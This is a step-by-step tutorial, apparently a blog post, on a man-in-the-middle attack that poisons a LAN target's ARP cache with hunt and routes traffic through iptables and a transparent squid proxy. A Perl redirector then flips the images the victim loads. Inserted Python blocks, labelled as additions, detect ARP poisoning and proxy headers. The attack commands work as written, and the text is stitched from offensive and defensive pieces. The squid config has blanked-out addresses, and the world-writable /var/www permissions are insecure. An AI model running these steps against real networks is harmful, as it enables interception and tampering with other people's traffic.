This is what we want to do:

- Make the target send all HTTP packets to us instead of to the gateway
- Forward them to the real gateway
- Modify the reply, with the pictures upside-down
- Forward the reply to the target

This is how we're going to do it:

1. Poison the ARP table of the target
2. Set up our PC as a gateway router
3. Send all HTTP requests through a squid proxy
4. Turn images upside-down with a squid script

Ok, sounds great, let's get started!

1. Poison the ARP table of the target

We want the target to send all packets to us instead of to the real gateway. To do this we need to know a little about IP addresses and MAC addresses. When we want to send a packet to 10.0.0.1, an ARP request is sent out on the local LAN, saying "Which computer is at ?", and the owner of that address then answers with an ARP reply "I am at , with MAC address 11:22:33:44:55:66". Then we send the packet to 11:22:33:44:55:66. ARP replies are cached in a local ARP table, so the next time we want to send to , we don't need to ask who's got it.

We are going to send a fake ARP reply to the target ( ), saying we are at . Usually ARP replies are accepted even though no request was sent, so this is actually really easy.

How do I do this? We can use arpoison to construct a fake packet and send it, but I prefer to use another, a bit more powerful tool, called hunt. You can download the hunt source code here, and compile it like this:

    tar zxvf hunt-1.5.tgz
    cd hunt-1.5
    make

If you're not comfortable compiling yourself, you can download the one I compiled (i386) here.

Fire up hunt:

    sudo ./hunt

In the menu system go to:

    d) daemons rst/arp/sniff/mac
    a) arp spoof + arp relayer daemon
    i/I) insert single/range arp spoof
    s/k) start/stop relayer daemon (press s)

Type in the IP of the real gateway, your MAC address (find this by running ifconfig), and the target's IP. Now we have poisoned the ARP table of the target.
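Seen from the target's side, the poisoning is visible in the very ARP cache that `arp -a` prints: the gateway IP suddenly resolves to a different MAC, and that MAC is usually also the one the spoofing host already owns in the cache. The following Python is an added example, not code from the original post; it parses Linux `arp -a` output and reports both indicators against a gateway MAC recorded while the network was known to be clean. The two sample tables are constructed, reusing the post's 10.0.0.1 / 11:22:33:44:55:66 values; `aa:bb:cc:dd:ee:ff` and 10.0.0.5 are made-up placeholders for the spoofing host.

```python
import re
from collections import defaultdict

# Matches Linux `arp -a` lines such as:
#   gateway (10.0.0.1) at 11:22:33:44:55:66 [ether] on eth0
#   ? (10.0.0.7) at <incomplete> on eth0      <- no MAC yet, skipped
ARP_LINE = re.compile(
    r"^\S*\s*\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+"
    r"(?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\b"
)


def parse_arp_table(text):
    """Parse `arp -a` output into {ip: mac}, MACs lower-cased."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def check_arp_table(table, gateway_ip, known_gateway_mac):
    """Return a list of findings; an empty list means nothing suspicious.

    Indicator 1: the gateway IP resolves to a MAC other than the recorded one.
    Indicator 2: one MAC answers for several IPs (the spoofing host's own
    entry and the forged gateway entry collide in the cache).
    """
    findings = []
    mac = table.get(gateway_ip)
    if mac is None:
        findings.append(f"gateway {gateway_ip} is not in the ARP cache")
    elif mac != known_gateway_mac.lower():
        findings.append(
            f"gateway {gateway_ip} resolves to {mac}, expected {known_gateway_mac.lower()}"
        )

    ips_by_mac = defaultdict(list)
    for ip, m in table.items():
        ips_by_mac[m].append(ip)
    for m, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            findings.append(f"MAC {m} is claimed by several IPs: {', '.join(sorted(ips))}")
    return findings


# Constructed sample output, not captured from a real network.
CLEAN_ARP = """\
gateway (10.0.0.1) at 11:22:33:44:55:66 [ether] on eth0
? (10.0.0.5) at aa:bb:cc:dd:ee:ff [ether] on eth0
? (10.0.0.7) at <incomplete> on eth0
"""

# The same LAN after the host at 10.0.0.5 has sent a forged reply for 10.0.0.1.
POISONED_ARP = """\
gateway (10.0.0.1) at aa:bb:cc:dd:ee:ff [ether] on eth0
? (10.0.0.5) at aa:bb:cc:dd:ee:ff [ether] on eth0
"""

GATEWAY_IP = "10.0.0.1"
GATEWAY_MAC = "11:22:33:44:55:66"  # recorded while the network was known to be clean

if __name__ == "__main__":
    for label, text in (("clean", CLEAN_ARP), ("poisoned", POISONED_ARP)):
        findings = check_arp_table(parse_arp_table(text), GATEWAY_IP, GATEWAY_MAC)
        print(label, "->", findings or ["ok"])
```

Run it periodically against live `arp -a` output (or from a cron job) and the gateway-MAC change shows up within one polling interval. The corresponding mitigation on the target is a static entry for the gateway (`arp -s <gateway ip> <gateway mac>` on Linux), which the kernel will not overwrite with an unsolicited reply.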
You can confirm the poisoning by typing "arp -a" on the target, and see that the gateway IP now has your MAC address.

2. Set up our PC as a gateway router

This is easy, just run these commands:

    sudo iptables -F
    sudo iptables -F -t nat
    sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    echo 1 > /proc/sys/net/ipv4/ip_forward

Where eth0 is your network interface connected to the LAN. The changes are reset the next time the network is reloaded.

3. Send all HTTP requests through a squid proxy

Install squid and reset its config:

    sudo apt-get install squid
    sudo mv /etc/squid/squid.conf /etc/squid/squid.conf.default

Edit /etc/squid/squid.conf with your favorite editor like this:

    http_port :8080
    http_port :8080
    visible_hostname gateway.my.flat
    cache_mgr proxy@foo.com
    httpd_accel_host virtual
    httpd_accel_port 80
    httpd_accel_with_proxy on
    httpd_accel_uses_host_header on
    acl all src /
    http_access allow all
    redirect_program /var/redirect

4. Turn images upside-down with a squid script

We use the redirect program defined in the squid config to flip our images. Edit /var/redirect to look like this:

    #!/usr/bin/perl
    $|=1;          # unbuffered output: squid waits for one reply line per request
    $count = 0;
    $pid = $$;     # per-process prefix so parallel redirectors don't clobber files
    while (<>) {
        chomp $_;
        if ($_ =~ /(.*\.jpg)/i) {
            $url = $1;
            system("/usr/bin/wget", "-q", "-O", "/var/www/$pid-$count.jpg", "$url");
            system("/usr/bin/mogrify", "-flip", "/var/www/$pid-$count.jpg");
            system("/bin/chmod", "777", "/var/www/$pid-$count.jpg");
            print "$pid-$count.jpg\n";
        } elsif ($_ =~ /(.*\.gif)/i) {
            $url = $1;
            system("/usr/bin/wget", "-q", "-O", "/var/www/$pid-$count.gif", "$url");
            system("/usr/bin/mogrify", "-flip", "/var/www/$pid-$count.gif");
            system("/bin/chmod", "777", "/var/www/$pid-$count.gif");
            print "$pid-$count.gif\n";
        } else {
            print "$_\n";   # anything that isn't an image passes through unchanged
        }
        $count++;
    }

As you can see from the script, we need to serve the flipped images from a local webserver.
Therefore, install apache:

    sudo apt-get install apache2
    sudo chmod -R 777 /var/www

At last, reload squid with the new configuration:

    sudo /etc/init.d/squid restart

You can test the squid by configuring your firefox to use localhost:8080 as a proxy server.

YOU HAVE NOW HACKED THE TARGET COMPUTER!
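A proxy inserted this way is not invisible to the client. Squid, unless its administrator disables it, stamps every forwarded response with a `Via:` header carrying its `visible_hostname` and port and an `X-Cache: HIT|MISS from <visible_hostname>` header, so a browser that was never configured to use a proxy receiving replies "via gateway.my.flat" is a clear sign of the setup above. The following Python is an added example, not code from the original post: it parses a raw HTTP response head and reports proxy hops that are not on an allow-list of the proxies the network is expected to have. The sample responses are constructed; `gateway.my.flat` is the hostname from the squid config above, and the squid version string in it is a placeholder.

```python
import re


def parse_response_headers(raw):
    """Split a raw HTTP response head (status line + CRLF-separated headers)
    into (status_line, {lowercase_name: [values]})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def proxy_findings(headers, trusted_proxies=()):
    """Report Via hops and X-Cache hosts that are not in trusted_proxies.

    Via values look like "1.0 gateway.my.flat:8080 (squid/2.x)" and may list
    several comma-separated hops; X-Cache looks like "MISS from gateway.my.flat".
    """
    findings = []
    for via in headers.get("via", []):
        for hop in via.split(","):
            parts = hop.split()
            if len(parts) < 2:
                continue
            host = parts[1].rsplit(":", 1)[0]  # drop the port, keep the hostname
            if host not in trusted_proxies:
                findings.append(f"Via: unexpected proxy hop {hop.strip()!r}")
    for xcache in headers.get("x-cache", []):
        m = re.search(r"\bfrom\s+(\S+)", xcache)
        if m and m.group(1) not in trusted_proxies:
            findings.append(f"X-Cache: unexpected cache host {m.group(1)!r}")
    return findings


# Constructed sample: what the target's browser receives through the squid above.
PROXIED = (
    "HTTP/1.0 200 OK\r\n"
    "Content-Type: image/jpeg\r\n"
    "Content-Length: 1234\r\n"
    "Via: 1.0 gateway.my.flat:8080 (squid/2.x)\r\n"
    "X-Cache: MISS from gateway.my.flat\r\n"
    "\r\n"
)

# Constructed sample: the same image fetched directly from the origin server.
DIRECT = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: image/jpeg\r\n"
    "Content-Length: 1234\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("proxied", PROXIED), ("direct", DIRECT)):
        status, headers = parse_response_headers(raw)
        print(label, status, "->", proxy_findings(headers) or ["no proxy hops"])
```

Feed it the response head from a browser's developer tools or a packet capture. On a network that legitimately runs a caching proxy, pass that proxy's hostname in `trusted_proxies` so only unknown hops are reported; a client that cannot see these headers at all (because the proxy stripped them) should treat a sudden change of the gateway MAC, as in the ARP check for step 1, as the primary signal.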


M14 Network Inc. | Hassnain Arts